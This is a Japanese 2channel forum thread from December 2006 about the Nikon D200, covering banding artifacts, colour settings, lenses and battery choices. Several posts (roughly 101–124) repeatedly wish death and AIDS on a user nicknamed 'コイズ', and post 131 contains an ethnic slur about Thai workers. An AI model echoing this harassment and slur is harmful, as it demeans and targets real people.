発売前から縞々や睫毛でスレは荒れまくったけど、まあ荒れるほど良いカメラって事かな。
スレ番号も未だに一番をキープしてるし。

ちなみに、自分のD200は滑り込みで調整中なので、最近は撮りためたRAWを現像したりしています。
http://dc-ita.dyndns.tv/~dc-ita/cgi-bin/imgboard/img-box/img20061216124139.jpg
なかなか良い色を出すのは難しいですねぇ・・・まあ元が良くないって事なんでしょうけど・・・

75 :名無CCDさん@画素いっぱい:2006/12/16(土) 13:18:56 ID:tq1nZO+m0
S5Proは連写弱そうだから鉄には不向きかと推察。
ついでに言うと、鉄は望遠重視だからフルサイズにはそんなにこだわらない。
D200買っといて適度に使い込んで
>>72に一票。
(フルサイズの)新機種出たら下取り出して購入
睫は多かれ少なかれ同系列のCCD積んだモデルには共通だろうから、
たたき直してくるだろうと思いたい。
駅の蛍光灯下で夜撮ると出るのですよ(お化けかぃ)。
一度150%表示してみると以後簡単に気づく罠。

76 :名無CCDさん@画素いっぱい:2006/12/16(土) 15:58:58 ID:dqrbNqrz0
トキナー50-135:知らん。
シグ50-150:写りは知らんけど明るさの割にコンパクトではある。

どなたか、使用されてる方の作例、熱望デツ



77 :名無CCDさん@画素いっぱい:2006/12/16(土) 16:05:01 ID:7ghzlWHD0
>>76
使ってはいないけど、興味は有る。

トキナー「AT-X 535 PRO DX 50-135mm F2.8」
http://dc.watch.impress.co.jp/cda/lens_review/2006/12/15/5255.html
〜シグマとトキナー、2つのF2.8ズームレンズで野生動物に挑戦
http://dc.watch.impress.co.jp/cda/review/2006/11/21/5079.html

78 :66:2006/12/16(土) 16:50:33 ID:1NMvZ3rgO
>70-75
レスどうもです。
昨年の冬は突然の銀塩撤退でFM3A買ってしまいD200の初期ロットをパス?
夏は嫁にS3IS買ってやって機嫌とったけど、購入を却下さ(ry
本当はD50持たして使わせてもらおうと思っていたんだけど…
ボーナス出るたびL玉買っていた独身時代は…
FM3Aはたまにしか使わないけど腕が落ちるとすぐわかるリハビリ用?
以上チラシの裏でした。
携帯からなのでAAや写真見れないのが残念です。
当方千葉在住なので、高光度LEDの被写体はあまりないのですが、来年2月のSLちばDC号の頃までには使いこなせるようになりたいです。
以前EF70-200F2.8Lのフレアには泣かされたのでキヤノンに戻る気はありません。
D70のガミラスブルーも設定変えて克服したのでD200も使いこなせば何とかなるかと思っています。
あっ、また千ラシの裏?


79 :名無CCDさん@画素いっぱい:2006/12/16(土) 18:25:47 ID:3docOuna0
「千ラシ」とは根っからの鉄ちゃんですねw

80 :名無CCDさん@画素いっぱい:2006/12/16(土) 20:37:04 ID:dqrbNqrz0
>>77
トン
見たけど、期待がある分、さほどの出来ではないような。

81 :名無CCDさん@画素いっぱい:2006/12/16(土) 21:15:30 ID:E4EYE5kM0
59 です。
本日、待望の D200 レンズキットを購入しました。
いやぁ〜、これはワクワクしますね。E8700 も愛用しているんですけど
コンデジとは存在感が全然違います。(笑)
父が F2 使いなので、年末に帰省した際にレンズを借りてこようと思ってます。

今日は購入してから雑用あれこれで、バッテリー充電して室内を試し撮り
した程度ですけど、明日はこいつを持ち出して、散歩がてらにあれこれ
撮り歩いてきます。

82 :名無CCDさん@画素いっぱい:2006/12/16(土) 22:02:11 ID:1NMvZ3rgO
購入オメ!

83 :名無CCDさん@画素いっぱい:2006/12/16(土) 22:05:31 ID:jz1rvaDV0
>>81
オメ!&いらっしゃい!!

84 :名無CCDさん@画素いっぱい:2006/12/16(土) 22:52:10 ID:3docOuna0
>>81
いいなあ

85 :名無CCDさん@画素いっぱい:2006/12/16(土) 23:10:39 ID:+Fww1bsh0
D70からの乗換えなんだけど、購入して1週間。

シャッター音、最初はぎこちなくてなんかいやだったけど、慣れてくるとイイ!ね。
バッテリーは相変わらず持たないね。そのうち予備を買ってこなきゃ。
あとどうしても気になるのが、色合い。
D70の時のような、しっとりとした落ち着きのある色合いじゃない。
なんかキャノン色が強いような?

おまいさんたちのお奨め設定はなんだい?

86 :名無CCDさん@画素いっぱい:2006/12/16(土) 23:36:09 ID:9OwCbYY60
mode I
諧調:標準
輪郭:標準
彩度:強め
色合い:+3
WB:晴天

が俺のデフォだ。

87 :名無CCDさん@画素いっぱい:2006/12/17(日) 00:48:05 ID:yWXDoTNT0
>>81
俺も8700からの乗り換え組。いまレンズと一緒に一年点検中。

久しぶりに8700さわると 軽っ!! ってなるよ

88 :名無CCDさん@画素いっぱい:2006/12/17(日) 00:58:38 ID:T9QYqcnK0
輪郭強調 標準
階調    オート
カラー    I
彩度    標準
色合い   +3°
高感度NR無し

後はRAW撮りでNX仕上げ
Jpg撮って出しとNCやNXのRAW-Jpg変換で解像感比較してみたけど
ソフト通した方がぜんぜんいいのでRAW撮りオンリーでつ。

89 :名無CCDさん@画素いっぱい:2006/12/17(日) 02:29:56 ID:6t9G3+sc0
>>73
未来からこんにちは!



90 :名無CCDさん@画素いっぱい:2006/12/17(日) 15:47:04 ID:OcI0Nxjp0
D200の画質の悪さは設定で救えるもんじゃないよ。

91 :名無CCDさん@画素いっぱい:2006/12/17(日) 19:33:54 ID:JK1xoQr90
コイズさぁ。D200使ってから言えよなぁ。
俺のD200貸してやろうか?

92 :名無CCDさん@画素いっぱい:2006/12/17(日) 20:07:54 ID:FZhd7fEy0
>>91
視度調節ツマミのノッチ数(手ごたえの数)が幾らか聞いてみたら。?
取説には数まで載っていないし・・・・
持ってる人なら 数分で回答できるよ (弄ると判る) 


93 :名無CCDさん@画素いっぱい:2006/12/17(日) 20:14:26 ID:JK1xoQr90
>>92
あ、いや、コイズは聞くまでもなくD200は使った事無いよ。
D70,D70s,D2H,D2Xは使っているけど。

94 :名無CCDさん@画素いっぱい:2006/12/17(日) 20:21:24 ID:zLS7IvHNO
>90はD2x板にいたキヤノ(ry

95 :名無CCDさん@画素いっぱい:2006/12/17(日) 21:18:58 ID:OcI0Nxjp0
>D70,D70s,D2H,D2Xは使っているけど。

D200は使い物にならないという判断ですねw

96 :名無CCDさん@画素いっぱい:2006/12/17(日) 21:24:11 ID:JK1xoQr90
>>95
だから、使ってから言えと。

97 :名無CCDさん@画素いっぱい:2006/12/17(日) 22:48:12 ID:Qo9o4USM0
81 です。
今日の午前中に、近くの公園で撮り歩いてきました。
冬の公園は殺風景かと思ってましたが、紅葉・黄葉それぞれ残っていて、
それなりに色彩の乗った絵が撮れましたよ。(笑)
E8700 では JPG か TIF ばかりで手間の掛かる RAW は敬遠していたのですが、
D200 から RAW で撮ってみて、改めてその有用性を実感。
楽しいですね!

私も若い頃は、新製品が期待通りじゃなかったときは、使いもしないで情報
だけを根拠に不満を口にしたものですが、所詮は道具なのだから欠点をどう
カバーするか、自分なりに工夫して使うことが上達のポイント。
本質を理解できるようになってからは、不満を口にすることも減りました。
自分なりのコツを得られたら、ますますその道具に愛着が湧きますよね。

>>87
お〜、仲間! E8700 は VR 未搭載と言うだけで冷遇されていたものの、
基本性能と付いているレンズは優れていますよね。
欠点を補って有り余る、隠れた名機だと思ってます。(笑)
ホント、D200 を持った後に E8700 を持つと、軽っ!&D40より小さっ!
って感じです。

98 :名無CCDさん@画素いっぱい:2006/12/17(日) 23:11:13 ID:OcI0Nxjp0
コンデジがどうしたって?w

99 :名無CCDさん@画素いっぱい:2006/12/17(日) 23:14:22 ID:ZFvsZ+jE0
コイズはキャノン買えばいいのに。
コイズがニコン使ってるのがイヤでたまんない。

100 :名無CCDさん@画素いっぱい:2006/12/17(日) 23:16:33 ID:OcI0Nxjp0
じゃー2ちゃん見なきゃいいよ。
価格も。
おれはその二つ以外には書き込んでないからね。


101 :名無CCDさん@画素いっぱい:2006/12/17(日) 23:17:23 ID:ZFvsZ+jE0
コイズ死ねばいいのに

102 :名無CCDさん@画素いっぱい:2006/12/17(日) 23:17:29 ID:JK1xoQr90
コイズが価格に書き込んでいるとは初耳だな。

103 :名無CCDさん@画素いっぱい:2006/12/17(日) 23:18:01 ID:g1Tli/310
憎まれっ子世に憚る

という諺もあるからね。

104 :名無CCDさん@画素いっぱい:2006/12/17(日) 23:18:17 ID:OcI0Nxjp0
ていうかもう名前を呼んだり相手したりしないほうがいい。
それが一番だよ。徹底スルー敢行ね。
もう話題にすることもしないほうがいい。


105 :名無CCDさん@画素いっぱい:2006/12/17(日) 23:18:58 ID:ZFvsZ+jE0
ほんとに死ねばいいのに

106 :名無CCDさん@画素いっぱい:2006/12/17(日) 23:19:32 ID:ZFvsZ+jE0
コイズほんとにエイズだったらいいのに

107 :名無CCDさん@画素いっぱい:2006/12/17(日) 23:19:46 ID:g1Tli/310
お前が書き込まないのが、一番。

という選択肢は無いのかい?

108 :名無CCDさん@画素いっぱい:2006/12/17(日) 23:20:16 ID:OcI0Nxjp0
>>102
もう2年ほどカキコしてないけどね。
あそこはレベル低くてつまんない。
2ちゃんのほうがレベル高いね。

109 :名無CCDさん@画素いっぱい:2006/12/17(日) 23:20:29 ID:ZFvsZ+jE0
死ねよ

110 :名無CCDさん@画素いっぱい:2006/12/17(日) 23:21:31 ID:JK1xoQr90
>>108
お、少しはまともになってきたな。

で、D200の画質のどこが悪いって?

111 :名無CCDさん@画素いっぱい:2006/12/17(日) 23:21:34 ID:ZFvsZ+jE0
鬱とか精神変調で死なないかな。

112 :名無CCDさん@画素いっぱい:2006/12/17(日) 23:30:12 ID:zLS7IvHNO
変なコテハン名のらないでコイズと書いてくれれば分かりやすいのに


113 :名無CCDさん@画素いっぱい:2006/12/17(日) 23:33:53 ID:OcI0Nxjp0
とにかくゴミの相手はしないこと。それが大事。

114 :名無CCDさん@画素いっぱい:2006/12/17(日) 23:39:32 ID:ZFvsZ+jE0
 死 ね ば い い の に

115 :名無CCDさん@画素いっぱい:2006/12/18(月) 01:34:48 ID:3xd7nfID0
>>113
あらら、自らをゴミだと認めやがった。
じゃぁ、要らない子は、とっとと氏ねばいいのに

116 :名無CCDさん@画素いっぱい:2006/12/18(月) 02:02:26 ID:18guZ/Ny0
電池が持たないのに画質が悪いってほんとうですか?

117 :名無CCDさん@画素いっぱい:2006/12/18(月) 02:06:36 ID:dTwMOLXX0
>>116
電池が持たないのは本当。
画質が悪いのは、コイズが言っているだけ。

118 :名無CCDさん@画素いっぱい:2006/12/18(月) 02:37:20 ID:3xd7nfID0
電池の持ちは確かに悪いが、予備電池を持ってれば無問題だし、
画質が悪いかどうかは自分のその目で確かめてくれよ。

119 :名無CCDさん@画素いっぱい:2006/12/18(月) 07:20:38 ID:Cug7LWqwO
そんな変な質問するのはID変わったコイズじゃないの?

120 :名無CCDさん@画素いっぱい:2006/12/18(月) 09:37:38 ID:Qyc0g3600
>>116,>>117
電池が若干持たないのは本当。
画質が悪いと言うのは、コイズがD200を使いこなせないだけ。

121 :名無CCDさん@画素いっぱい:2006/12/18(月) 12:23:59 ID:UCB336fnO
コイズがD200なんて持ってる訳無いw
リアルに来月からの米代にも事欠く御様子。

122 :名無CCDさん@画素いっぱい:2006/12/18(月) 14:08:16 ID:18guZ/Ny0
D200にトキナーあたりの広角レンズ付けるような恥ずかしいおっさんにはなりたくないよねえw


123 :名無CCDさん@画素いっぱい:2006/12/18(月) 14:10:52 ID:dTwMOLXX0
>>122
おいおい、トキナーの12-24はニコンより良いくらいだぞ。比べた事有るの?
それよりD200の画質のどこが悪いって?

124 :名無CCDさん@画素いっぱい:2006/12/18(月) 14:11:03 ID:kfhzSO120
コイズは死ねばいいのに

125 :名無CCDさん@画素いっぱい:2006/12/18(月) 14:45:05 ID:mZaLhnhb0
>>12
文章がスレの寄せ集めで独創性が無く、ユーザーを刺激する程の文章力も無し。
評価:5点

ちなみに後半は俺が書いた文章をいじってるね。君。
この話は「趣味のニコンカメラ」じゃないよ。俺が間違ってた。





126 :名無CCDさん@画素いっぱい:2006/12/18(月) 16:29:46 ID:4s6WPXpJ0
>>122
http://dc.watch.impress.co.jp/cda/review/2004/12/09/607.html

127 :名無CCDさん@画素いっぱい:2006/12/18(月) 20:01:02 ID:F6Y+1T5z0
今日、飛行機(戦闘機)の写真が載ってる来年のカレンダーを貰った。
良く見たら、キャノピーの部分に見たことある縞が・・・

128 :名無CCDさん@画素いっぱい:2006/12/20(水) 01:23:16 ID:h68HmbePO
なんで072スレの方が上に上がっているんだ?
保守

129 :名無CCDさん@画素いっぱい:2006/12/20(水) 20:59:55 ID:yzXL71yR0

http://www.dpreview.com/reviews/pentaxk10d/page15.asp
ちょっと気になったんだが、D200はこの場合、D80と同等の画質と考えていいの?
それとも後発のD80のほうがやはり画質はいいのか?

130 :名無CCDさん@画素いっぱい:2006/12/20(水) 21:32:32 ID:hCHELGUs0
昨日買ったD200。
液晶モニタにどっと抜け発見。
ショックだ。仕方なし?

131 :名無CCDさん@画素いっぱい:2006/12/20(水) 21:35:17 ID:V4BW/JPl0
>>130
タイの土人が作ってるんだからそれぐらい許容しろよあほがwww

132 :名無CCDさん@画素いっぱい:2006/12/20(水) 21:43:36 ID:8+i++yNo0
>>130
キタムラまら交換してくれる。
量販店ならムリ。

133 :名無CCDさん@画素いっぱい:2006/12/20(水) 22:39:48 ID:8F64l14P0



画質革命って激しく失敗じゃね?
http://www.dpreview.com/reviews/pentaxk10d/page15.asp





134 :名無CCDさん@画素いっぱい:2006/12/20(水) 22:42:20 ID:AUFgpZsz0
メーカー別売り上げはニコンがトップ。シェア50%まであと一歩。
http://headlines.yahoo.co.jp/hl?a=20061220-00000015-bcn-sci
D200もまだまだ売れ続けているようだ。

135 :名無CCDさん@画素いっぱい:2006/12/20(水) 22:49:44 ID:V4BW/JPl0
最近のロットで縞が改善されたと聞かされるほど
初期を掴まされた客に連絡もしないニコンって会社
つくづくどうしようもないメーカーだと感じるよ、
怖くて選べないメーカーです。


136 :名無CCDさん@画素いっぱい:2006/12/20(水) 22:59:13 ID:knbqXlwu0
どこかのメーカーは不具合を修正できないまま見切り発車したそうだが
ラーメン悔いテエな

137 :名無CCDさん@画素いっぱい:2006/12/21(木) 00:00:59 ID:hXuDQnrs0
>>132
淀でも店員にドット抜けを示せば、即行交換してくれるよ。

138 :名無CCDさん@画素いっぱい:2006/12/21(木) 02:12:16 ID:onu806TT0
縞は調整で出なくなり、睫毛は慣れた。
最近はAWBで晴天夕方の青かぶりが気になる。



139 :名無CCDさん@画素いっぱい:2006/12/21(木) 08:45:56 ID:qnhUDWYY0
>>138
夕焼けとか夕日に照らされたもの?
それとも夕刻の日陰?
AWBで全体が赤いもの撮れば当然青被りになるのだけど、
そういう訳じゃないんだよね?

140 :名無CCDさん@画素いっぱい:2006/12/21(木) 09:28:38 ID:Gfk7Vly/0
先日、コンサートの撮影にD200持っていきました。
MB-D200にフル充電のEN-EL3e2本詰め込んでたのですが
みるみる消耗していくのにはちょっと焦りました。
一個ずつ使って、片方がカラになったら
次にバトンタッチしてくれる機能は便利だと思ったけど。

予備として使ったD100は電池一個で最後までもってくれました(^_^;)

141 :名無CCDさん@画素いっぱい:2006/12/21(木) 09:56:10 ID:tRuAjcf+0
>>140
エネループ使え

142 :名無CCDさん@画素いっぱい:2006/12/21(木) 12:13:39 ID:mQHsk4in0
充電池二本とエネループ
どっちが電池持つのん?

143 :名無CCDさん@画素いっぱい:2006/12/21(木) 19:33:00 ID:5dzUQISx0
エネループはVR効かせまくりで2,000枚くらいは逝く。

144 :名無CCDさん@画素いっぱい:2006/12/21(木) 21:23:09 ID:5t4kizx60
サンヨー>>>>>>>>>>>>ニコン   ってことか・・・

145 :名無CCDさん@画素いっぱい:2006/12/21(木) 22:00:15 ID:3eS8JV6E0
SONYだろ

146 :名無CCDさん@画素いっぱい:2006/12/21(木) 22:04:18 ID:tRuAjcf+0
エネループ安いよ
1セット分6本で2300円前後
EN-EL3eが7000円ぐらい。
エネループいいと思うんだけどね。


147 :名無CCDさん@画素いっぱい:2006/12/21(木) 22:05:14 ID:JKKf+U7Z0
充電池は高々1600だろ
単3の容量考えれば、仕方ない。

148 :名無CCDさん@画素いっぱい:2006/12/21(木) 22:38:26 ID:tRuAjcf+0
そう言えばエネループのOEMでソニループも出てるね。



149 :名無CCDさん@画素いっぱい:2006/12/21(木) 22:57:51 ID:XmrrIdXV0
やな名前だw

150 :名無CCDさん@画素いっぱい:2006/12/21(木) 23:13:38 ID:SQMxNX0O0
F5とS2Proを長く使ってましたが、安くなってきたし、
クリスマスにD200を買おうと思います。

ただ電池がもたないという話は気になりますね。
S2Proでも単三ニッケル水素を5組くらい使ってましたが、
自作で外部電源化しちゃったくらい。
エネループですか・・・・

151 :名無CCDさん@画素いっぱい:2006/12/21(木) 23:15:29 ID:06KMVaJk0
>>150
S2proってエネループだと何コマくらい行けるんですか?

152 :名無CCDさん@画素いっぱい:2006/12/21(木) 23:19:41 ID:r84WeQ4j0
ROWAとか、サードパーティーのEL3e互換バッテリーはどうなのかなぁ・・
あれを複数持つ方がMB-D200+エネループより軽くて便利なように思うん
だが。



153 :名無CCDさん@画素いっぱい:2006/12/21(木) 23:37:51 ID:HXWnb3XL0
>>148
エネループ、パナループ、ソニループは、それぞれの
メーカの独自品じゃなかったっけ?

154 :名無CCDさん@画素いっぱい:2006/12/21(木) 23:44:51 ID:UbScmGIQ0
>>139
12月はじめ、午後3時頃の日向と日陰と両方だね。
ほぼ夕方に近い。被写体はいろいろ。
おっしゃるっとおり、赤系の被写体は青かぶりが強い。
しかし、普通の被写体(人物と建物、建物と青空)などでも
青かぶりがかなりある。
WBを晴天にするとだいぶ良いがそれでも全体に青っぽくて
黄色などくすんで見えるよ。色温度入力での調整は必要だね。
ファームアップしてから目立つような気がする。
と言うことでRAW撮り主体を心がけてるよ。
AFの速さ、ミラーショックの少なさ、連写の速さ、
それから内蔵ストロボ調光の良さを考えると
他社製品も持ってるけど結局D200持ち出してる。


155 :名無CCDさん@画素いっぱい:2006/12/21(木) 23:50:30 ID:tRuAjcf+0
エネループとソニループは同じでしょ。
パナループは独自品少し保存性が悪い?

156 :名無CCDさん@画素いっぱい:2006/12/21(木) 23:51:05 ID:YrA6Mu8X0
>>151
エネループは2000mAhでしょう。
それなら2700mAもある普通のNiMHの方が35%も容量が大きい。
実際よく保つ。6本で2000円もあればおつりが来る。
純正のリチウム充電池を買うのがばからしくなる。


157 :名無CCDさん@画素いっぱい:2006/12/21(木) 23:53:56 ID:SQMxNX0O0
S2Proはマイクロドライブが指定されている上、
リチウム抜きの単三だけで動かすとやたら電気を食います。
連写すると電圧が下がって書き込みエラーが出るので、
充電池1セットでせいぜいRAW40枚くらいしか撮れなかったかと。

まあ買った当時はデジ一だしそんなもんだと思ってたんですが・・・・・

158 :名無CCDさん@画素いっぱい:2006/12/21(木) 23:57:05 ID:06KMVaJk0
>>157
あ CR123か何かと併用。それは辛いすね・・・

159 :百聞不如一見 ◆ASuz8JkzN. :2006/12/22(金) 00:00:39 ID:Dz39hsKl0
>>150
S2ProならMyBatteryという選択肢もありますよ。良さげです。
ttp://www.jtt.ne.jp/products/original/expert/index.html


160 :名無CCDさん@画素いっぱい:2006/12/22(金) 00:01:49 ID:Zu0GyoTP0
>>152
今のところ、ROWAしか使っていないが、全く問題なし。
そのうち、違うメーカーにもチャレンジする予定。

161 :名無CCDさん@画素いっぱい:2006/12/22(金) 00:07:34 ID:RKauz3aL0
>>156
使う前の日に充電するなら確かに容量の大きいほうが良いですね。
エネループは充電して半年ぐらい放置してても自然放電が少ないので
管理が簡単なんですよね。

162 :名無CCDさん@画素いっぱい:2006/12/22(金) 00:31:03 ID:uMSBW5vZ0
>>157
マイクロドライブの方がCFよりどれくらい電池喰う?

163 :名無CCDさん@画素いっぱい:2006/12/22(金) 00:58:04 ID:82AbSNJu0
SANYOの2700なんて絶対買うなよ。あれは本当に地雷だからな

164 :名無CCDさん@画素いっぱい:2006/12/22(金) 01:47:34 ID:JzjXl3Yi0
>>163
容量の大きさに釣られ、そのSANYOの2700を買った(汗)
充電した翌日に使い切るなら最強だけれども
数日間をおくと、容量が激減してる!
激しい自然放電(化学反応?)でホントに地雷だね(笑)

前日に確実に充電して用意してれば2700は最強だが
油断していて、いざ使おうと思うとアレ?ってなる。
エネループで俺は幸せになった。
充電しておけば、後は使いたい時にパッと使える。

165 :名無CCDさん@画素いっぱい:2006/12/22(金) 05:18:48 ID:heE5sXCd0
ハア / J uJ J u \ ( )
   / u J ━  ━ |
  | J J  (・) (・)| ハア
( )(6   J J つJ )
 (  | J  u┏━┓|     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ハア\ J  ┃□┃|   < 使いたい時にパッと…ハァハァ
|\/ ̄ ̄ ̄|_■■■/⌒\________
\.| D 8 0  |         .\            / ̄ ̄ヽ
  \ 完全 |       /⌒⌒ヽ         /      \
   \ガイド|・  | \ (   人  )      /        ヽ
     \___| /     ゝ    ヽ \   /          |

166 :名無CCDさん@画素いっぱい:2006/12/22(金) 06:30:24 ID:lrDwK4Vs0
>>163.164
自分のGPの2700mAhは一ヶ月放置しても平気。
秋月にあった。

167 :名無CCDさん@画素いっぱい:2006/12/22(金) 09:46:05 ID:jrd+vpAG0
エネループはスピードライト用で常用してるよ。
常に6本予備を用意してるから、D200用の予備にもなる。
乾電池という消耗品が、充電によって消耗品でなくなるのは
非常に助かる。

168 :名無CCDさん@画素いっぱい:2006/12/22(金) 13:20:21 ID:mY1NkN6b0
エネループとサンヨーの2700両方持ってるけど、D200で使うとあまり変わらない感じがしたのは
折れだけか?

169 :名無CCDさん@画素いっぱい:2006/12/22(金) 16:00:56 ID:RKauz3aL0
俺も超急速充電器につられてソニーの2500を1セット使ってるが
エネループと持ちは変わらないね。自然放電は早い。
充電器だけ欲しかった
(なんせ4本15分充電だもん、エネループでも25分で充電完了)

170 :名無CCDさん@画素いっぱい:2006/12/22(金) 21:31:23 ID:2sEhLuF80
充電状態が個別にモニターできる充電器を買ったところ、
古いニッケル水素は意外とバラツキが出ているのが判った。
4本セットの中には1本だけ電圧が上がらない電池もあって、
これが極端に容量が小さくなっていた原因らしかった・・・
接点を磨いておくとか、手入れが必要かも。

171 :66:2006/12/23(土) 19:32:01 ID:J03KGMLwO
流れを止めて悪いのですが、先程D70とVR24-120を嫁に出してD200購入しました。
早く家に帰って充電したい。
以上千ラシの裏でした。

172 :名無CCDさん@画素いっぱい:2006/12/23(土) 20:26:31 ID:1nJBh6xv0
>>171
個人的なこと書くなよぼけが

173 :名無CCDさん@画素いっぱい:2006/12/23(土) 20:43:48 ID:WmnRQpze0
いくら安くても、中華製の充電池だけは買ってはいけないね。
熱くなって充電できないのが混じっていたり、液漏れしやがったり・・・・・・。

CR123A型の充電池セットは国産に無いのでイイと思って買ったら、
なんと3回と使わんうちに死んでしまった。
使いきり電池より高くついたし、
もちろんそれでもノークレーム・ノーリターン・・・・・・・

174 :名無CCDさん@画素いっぱい:2006/12/23(土) 22:02:18 ID:7wAYjCS50
>>171
いいんじゃないすか。

>>172 るせーんだよ
パンパンパーン
    ∧__∧  ∩
  (,,`・ω・´)彡☆
   ⊂彡☆))Д´)
       ☆


175 :名無CCDさん@画素いっぱい:2006/12/23(土) 22:02:21 ID:IqCNGfen0
なんかここのスレ観てるとニコン地に落ちたな感大きい
買うならD200だと思ってたのに・・

176 :名無CCDさん@画素いっぱい:2006/12/23(土) 22:26:25 ID:BOhXM4gX0
買って、がっかりした事。
・ノイズがやたら多い事
・バッテリーの持ちが悪い事
・水平取ってもD70の頃みたいに左下がりに写ってしまう事
・AE-L、AF-Lボタンが上下逆さまに付いていた事

177 :名無CCDさん@画素いっぱい:2006/12/23(土) 22:53:59 ID:4nk5tvui0
買って期待通りだったことは?

178 :名無CCDさん@画素いっぱい:2006/12/23(土) 23:23:44 ID:y9K3DhWB0
このスレの評判

179 :名無CCDさん@画素いっぱい:2006/12/23(土) 23:39:14 ID:BOhXM4gX0
買って、良かった事。
・連写スピード。何でも撮れそうな気になる。(しかし、ほとんど出番無し)

だけだなぁ。


180 :66:2006/12/23(土) 23:49:43 ID:Ch4Hli1x0
とりあえず充電が終わったのでカキコ
ファームは初めから2.00になっていました。

期待どおりだったこと
背面液晶がきれい、ファインダーがよい
D70のファーストショットでなんだこりゃというガミラスブルーではなかったこと
あとは使いこなしながら見つけてみます。

期待はずれだったこと
ニコンのマニュアルは相変わらず難しい?


181 :名無CCDさん@画素いっぱい:2006/12/24(日) 00:00:44 ID:yPHCjWX10
>>171

オメ!

おれもD70を下取りに出して
夏ボでD200を買ったよ。
ISO1600はキツイけど、
それ以外は大満足。

182 :名無CCDさん@画素いっぱい:2006/12/24(日) 00:04:01 ID:OzVfYQIX0
>>180
オメ!!漏れも火曜日に入手したとこ。
発売当初から此処で散々煽りを見てきたせいか、全てが期待以上だったよw
バッテリーが持たないのが玉に瑕だけど、各自工夫で何とかなる事だし、
カメラ自体の使い勝手がF100以上で、「200」の名に偽り無しの出来だった
事に感心した。
ついにデジタル一眼の完成度がフィルムカメラを上回る時代になったのかと
感動している。ファインダー倍率はもっと頑張って欲しいとこだけど、APS-Cでは
これが限界なのかな?


183 :名無CCDさん@画素いっぱい:2006/12/24(日) 00:04:30 ID:ZJtTyqLCO
縞縞あげ

184 :66:2006/12/24(日) 00:22:44 ID:/NjjLV9N0
>181-182
どうもです。
現在、取説見ながら試行錯誤しています。
以前購入したDK-21M
眼鏡使用の私はやはり周囲がけられます…
それ以外は概ね満足です。
わかりやすい解説本があったら是非教えて下さい。

185 :名無CCDさん@画素いっぱい:2006/12/24(日) 00:56:28 ID:XdzcAmFq0
今頃コレ買うとは...待てないのか?

186 :名無CCDさん@画素いっぱい:2006/12/24(日) 01:02:40 ID:JfhzMijf0
他人が何買おうが関係ないだろさ。
あっちは価格帯もやや違うのだから。
手放しに喜ばせてやりゃいいのに。

187 :名無CCDさん@画素いっぱい:2006/12/24(日) 01:42:42 ID:YWzrC+j00
>>185はケチをつけたいだけのひねくれ者。

188 :名無CCDさん@画素いっぱい:2006/12/24(日) 01:45:20 ID:qtkL8B6l0
その、待てない、というのは、
SD14のことでしょ?

来春になっちゃったからね。

189 :名無CCDさん@画素いっぱい:2006/12/24(日) 01:48:37 ID:p4txhhAW0
SD14って連写秒何コマ?
このスレで話題に出るって事は8コマくらいは最低でもいくんだろうなぁ。

190 :名無CCDさん@画素いっぱい:2006/12/24(日) 02:37:13 ID:sfeluvLVO
秒間5コマ撮れて、持ち運びしやすいのは選択肢限られているし…
1年半でたいして変わらないのにFMC繰り返すあれは買いたくないとなれば、一択となるのだが…

191 :名無CCDさん@画素いっぱい:2006/12/24(日) 09:33:49 ID:c3o18pUz0
待てるヤツは永遠に待っていればいい

192 :名無CCDさん@画素いっぱい:2006/12/24(日) 11:21:29 ID:AYYR5vK70
>>191
ぞんざいに聞こえるな。
待てる方は待っていいと思う。

193 :名無CCDさん@画素いっぱい:2006/12/24(日) 11:28:08 ID:f54DSpwH0
>>192
で、何を待っているの?

194 :名無CCDさん@画素いっぱい:2006/12/24(日) 13:07:31 ID:IZ06Zf140
つか待てる奴は新しいのが出ても、さらに待てる奴だから。
永久に待ち続け死んでいく人生。

195 :名無CCDさん@画素いっぱい:2006/12/24(日) 14:27:31 ID:q0EZfqUM0
クリスマスイブに基地外が降臨しました!!!

【小さい】Nikon D40 Prat7【かわいい】
http://hobby7.2ch.net/test/read.cgi/dcamera/1166622076/379

379 名前:名無CCDさん@画素いっぱい[sage] 投稿日:2006/12/24(日) 04:43:30 ID:jB4GCTRd0
JPEG撮って出しがだんだん良くなってきていて、RAWとの差が小さくなったと思う。
D70 RAW>>>JPEG
D50 RAW>>JPEG
D40 RAW>JPEG


196 :名無CCDさん@画素いっぱい:2006/12/24(日) 14:41:01 ID:AYYR5vK70
す れ 地 概 い <<  気 地 概 胃

197 :名無CCDさん@画素いっぱい:2006/12/24(日) 18:13:07 ID:iDFxLnxS0
今日、D200を買ってきました。
年内に欲しいと思って昨日からあちこち巡り歩いたんですが、
ポイント付きとは言え18万円台とか在庫無しとかばっかり。
でも最後に寄った地元のキタムラで、特別値引き158000円というセール。
ネット通販以外では最安&店頭在庫だったもんで即決でした。

で、キタムラに無かったMB−D200を買いにエイデンに行ったところ、
なんと、かのVR18−200が1本だけ入荷してました。
店の人は、きのうから並べているんですが誰も気付いて無いですね・・とか。
完全に予算オーバーだったけど、この際カードを使い買ってしまいました。

・・・・まさかD200とVR18−200が一緒に買えるとは。
今年の幸運をきっちり使い切った感じです。

198 :名無CCDさん@画素いっぱい:2006/12/24(日) 18:18:39 ID:YWzrC+j00
>>197

オメ!

>今年の幸運をきっちり使い切った感じです。
今年はもう残り少ないのでもーまんたい。

199 :名無CCDさん@画素いっぱい:2006/12/24(日) 18:27:53 ID:rals/UCp0
>>197
オメ!
来年の運を使ってなければいいけどなw

200 :名無CCDさん@画素いっぱい:2006/12/24(日) 19:03:30 ID:IwtLKnY+0
D300では電池室を大きくして、バッテリーグリップなしで単三*6本が使えるようにしろ。

201 :名無CCDさん@画素いっぱい:2006/12/24(日) 19:08:02 ID:sfeluvLVO
>>197オメ!
私も昨日三宝で155kのところ、D70・24-120を下に出して105kで購入しました。
店頭在庫のVR70-300を衝動買いしそうになったけど、正月明けに資金が残っていたらと思いとどまりました。
年明けに予約したいです。


202 :名無CCDさん@画素いっぱい:2006/12/24(日) 19:49:49 ID:qtkL8B6l0
D200
ISO800・1000でも、被写体次第では、十分実用的だ。

203 :名無CCDさん@画素いっぱい:2006/12/24(日) 19:52:14 ID:sm8/tRtc0
>>197
早まったな、この野郎!w

204 :名無CCDさん@画素いっぱい:2006/12/24(日) 20:02:50 ID:tCmr2v6HO
>>197
ったく、そんなレンズ得意気に付けてんなよ・・D200が泣くよ。


205 :名無CCDさん@画素いっぱい:2006/12/24(日) 20:24:19 ID:IGw1vt7g0
最近D200買った人に質問!
シリアルナンバーはどの辺まで進みましたか?
同時発売のVR18-200は60万台行ってるらしいですね。

